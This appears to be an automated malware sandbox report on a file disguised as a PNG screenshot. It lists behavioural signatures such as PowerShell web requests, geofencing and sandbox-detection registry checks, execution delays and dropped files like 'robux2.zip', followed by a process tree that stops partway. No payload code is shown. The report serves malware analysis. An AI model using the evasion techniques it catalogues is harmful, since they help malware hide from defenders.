ea717e5576dbd3052c3429470ad4f3bc9bae374d4b9cc7d1c0e68055ec810543

Resubmissions

11-08-2024 18:50

240811-xg9eaasfln 8

11-08-2024 18:41

11-08-2024 18:41

11-08-2024 18:38

11-08-2024 18:17

11-08-2024 18:16

11-08-2024 18:15

11-08-2024 17:52

Analysis

max time kernel
512s
max time network
488s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
11-08-2024 18:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Screenshot 2024-08-06 212650.png
Size

302KB
MD5

8215cf98ee78db9c15eb03c1d565f6f9
SHA1

03020983659e6d6c61631de0bfdec9a965ec5155
SHA256

ea717e5576dbd3052c3429470ad4f3bc9bae374d4b9cc7d1c0e68055ec810543
SHA512

8e16cdb25bd785bf11608fb983125f71394da0091fa9769ee8504194d0626fca1b66e08245ba6d52af1e498bc16635fcdaedf1dd6b4a77cf9a53d4cd5278a28e
SSDEEP

6144:Rl53DXhOKICpEkz40IFGtwyYCzGpvgrUz9iYdwYIsQ1IxxeTMuG:RlxXgKI2xzdqG1ZTrURnuRsdxxe8

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 10 IoCs

flow	pid	Process
184	2260	powershell.exe
186	2260	powershell.exe
187	4724	powershell.exe
189	4724	powershell.exe
192	5600	powershell.exe
193	5600	powershell.exe
196	1124	powershell.exe
198	1124	powershell.exe
205	5504	powershell.exe
207	5504	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2260	powershell.exe
4724	powershell.exe
5600	powershell.exe
1124	powershell.exe
5504	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops file in System32 directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log	svchost.exe
File opened for modification	C:\Windows\system32\robux2.zip	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File created	C:\Windows\system32\robux2.zip	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\system32\robux2.zip	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx	svchost.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	robux.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	robux.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	robux.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	melter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	robux.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Delays execution with timeout.exe 9 IoCs

evasion

pid	Process
2572	timeout.exe
5660	timeout.exe
5344	timeout.exe
1628	timeout.exe
3592	timeout.exe
5752	timeout.exe
5724	timeout.exe
2572	timeout.exe
2008	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133678757251946385"	chrome.exe

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1194130065-3471212556-1656947724-1000\{507FBCB5-F69F-49D5-A605-C03B36EDC0A6}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1194130065-3471212556-1656947724-1000\{189F42B8-C349-465C-803C-8256480EFC7B}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	mspaint.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

pid	Process
5136	msedge.exe
5136	msedge.exe
1244	msedge.exe
1244	msedge.exe
5876	identity_helper.exe
5876	identity_helper.exe
5200	msedge.exe
5200	msedge.exe
1432	msedge.exe
1432	msedge.exe
2260	powershell.exe
2260	powershell.exe
2260	powershell.exe
4724	powershell.exe
4724	powershell.exe
4724	powershell.exe
5688	msedge.exe
5688	msedge.exe
5688	msedge.exe
5688	msedge.exe
5600	powershell.exe
5600	powershell.exe
5600	powershell.exe
5124	mspaint.exe
5124	mspaint.exe
1360	mspaint.exe
1360	mspaint.exe
5460	mspaint.exe
5460	mspaint.exe
1124	powershell.exe
1124	powershell.exe
5504	powershell.exe
5504	powershell.exe
4012	chrome.exe
4012	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
2864	OpenWith.exe
4004	OpenWith.exe
1032	cmd.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

description	pid	Process
Token: SeDebugPrivilege	4512	firefox.exe
Token: SeDebugPrivilege	4512	firefox.exe
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	4724	powershell.exe
Token: SeDebugPrivilege	5600	powershell.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeDebugPrivilege	5504	powershell.exe
Token: 33	5440	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5440	AUDIODG.EXE
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	4012	chrome.exe
Token: SeCreatePagefilePrivilege	4012	chrome.exe
Token: SeShutdownPrivilege	8908	shutdown.exe
Token: SeRemoteShutdownPrivilege	8908	shutdown.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
2796	SndVol.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
4512	firefox.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
1244	msedge.exe
2796	SndVol.exe
2796	SndVol.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4512	firefox.exe
5124	mspaint.exe
2864	OpenWith.exe
1360	mspaint.exe
5084	OpenWith.exe
5460	mspaint.exe
4004	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4452 wrote to memory of 4512	4452	firefox.exe	97
PID 4452 wrote to memory of 4512	4452	firefox.exe	97
PID 4452 wrote to memory of 4512	4452	firefox.exe	97
PID 4452 wrote to memory of 4512	4452	firefox.exe	97
PID 4452 wrote to memory of 4512	4452	firefox.exe	97
PID 4452 wrote to memory of 4512	4452	firefox.exe	97
PID 4452 wrote to memory of 4512	4452	firefox.exe	97
PID 4452 wrote to memory of 4512	4452	firefox.exe	97
PID 4452 wrote to memory of 4512	4452	firefox.exe	97
PID 4452 wrote to memory of 4512	4452	firefox.exe	97
PID 4452 wrote to memory of 4512	4452	firefox.exe	97
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 3352	4512	firefox.exe	98
PID 4512 wrote to memory of 4720	4512	firefox.exe	99
PID 4512 wrote to memory of 4720	4512	firefox.exe	99
PID 4512 wrote to memory of 4720	4512	firefox.exe	99
PID 4512 wrote to memory of 4720	4512	firefox.exe	99
PID 4512 wrote to memory of 4720	4512	firefox.exe	99
PID 4512 wrote to memory of 4720	4512	firefox.exe	99
PID 4512 wrote to memory of 4720	4512	firefox.exe	99
PID 4512 wrote to memory of 4720	4512	firefox.exe	99

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Screenshot 2024-08-06 212650.png"
1⤵
PID:3140

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4452
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4512
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 1920 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5945f944-19d3-4754-ad23-9af69ea46f1f} 4512 "\\.\pipe\gecko-crash-server-pipe.4512" gpu
    3⤵
    PID:3352
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2404 -prefMapHandle 2400 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {125ca3cd-bd8c-41f1-b7a9-996ae6d99553} 4512 "\\.\pipe\gecko-crash-server-pipe.4512" socket
    3⤵
    - Checks processor information in registry
    PID:4720
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1560 -childID 1 -isForBrowser -prefsHandle 2776 -prefMapHandle 2772 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {034c8810-5771-4230-b219-7c2153bbf6b7} 4512 "\\.\pipe\gecko-crash-server-pipe.4512" tab
    3⤵
    PID:2748
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4024 -childID 2 -isForBrowser -prefsHandle 4008 -prefMapHandle 4020 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a12a9bf5-6d8d-4970-a35d-b9dd0a6a1040} 4512 "\\.\pipe\gecko-crash-server-pipe.4512" tab
    3⤵
    PID:2040
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4836 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4856 -prefMapHandle 4848 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97db519a-01fe-454b-8213-a5cf08a692fc} 4512 "\\.\pipe\gecko-crash-server-pipe.4512" utility
    3⤵
    - Checks processor information in registry
    PID:5144
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5232 -childID 3 -isForBrowser -prefsHandle 5140 -prefMapHandle 5212 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {de22424e-c03b-42d5-bd80-e68522e33f6e} 4512 "\\.\pipe\gecko-crash-server-pipe.4512" tab
    3⤵
    PID:5816
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5352 -childID 4 -isForBrowser -prefsHandle 5360 -prefMapHandle 5364 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5c465512-185b-4127-9ff9-c0af95cf54bf} 4512 "\\.\pipe\gecko-crash-server-pipe.4512" tab
    3⤵
    PID:5828
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5556 -childID 5 -isForBrowser -prefsHandle 5636 -prefMapHandle 5632 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6f06669-5d64-44ed-96b9-8f3f6fbf4c5c} 4512 "\\.\pipe\gecko-crash-server-pipe.4512" tab
    3⤵
    PID:5840
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3712 -childID 6 -isForBrowser -prefsHandle 5400 -prefMapHandle 5404 -prefsLen 27211 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {581be258-64be-4356-8759-66300163328f} 4512 "\\.\pipe\gecko-crash-server-pipe.4512" tab
    3⤵
    PID:2516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe4dd546f8,0x7ffe4dd54708,0x7ffe4dd54718
  2⤵
  PID:760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
  2⤵
  PID:3372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
  2⤵
  PID:4372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
  2⤵
  PID:5532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
  2⤵
  PID:5544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
  2⤵
  PID:2516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
  2⤵
  PID:512
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
